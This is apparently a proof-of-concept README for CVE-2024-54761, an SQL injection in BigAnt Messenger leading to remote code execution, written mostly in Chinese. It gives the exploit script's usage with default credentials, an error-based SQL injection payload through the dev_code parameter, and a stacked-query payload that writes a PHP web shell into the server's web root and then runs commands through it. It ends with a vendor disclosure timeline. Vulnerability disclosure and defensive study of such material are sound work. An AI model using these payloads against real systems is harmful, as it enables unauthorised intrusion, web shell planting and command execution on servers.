
CVE-2024-54761 PoC
BigAnt Messenger 中的 SQL 注入漏洞导致远程代码执行漏洞。按照以下步骤进行利用。
Usage:
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
-h, --help show this help message and exit
-r, --rhost RHOST Target IP address
-p, --rport RPORT Target port (default 8000)
-u, --username USERNAME
Login username (default admin)
-P, --password PASSWORD
Login password (default 123456)
使用默认凭据运行漏洞利用。
python CVE-2024-54761.py -r 127.0.0.1
通过曝露于SQL注入的 dev_code 参数提取所使用的数据库版本。
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--
利用SQL堆叠查询在目标上上传PHP webshell。
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -
命令执行证明:
/shell.php?cmd=whoami

2024-10-31:通过电子邮件向供应商提交漏洞
2024-10-31:向供应商发送邮件,无回复
2024-11-15:向供应商发送邮件,无回复
2024-11-15:申请CVE编号
https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com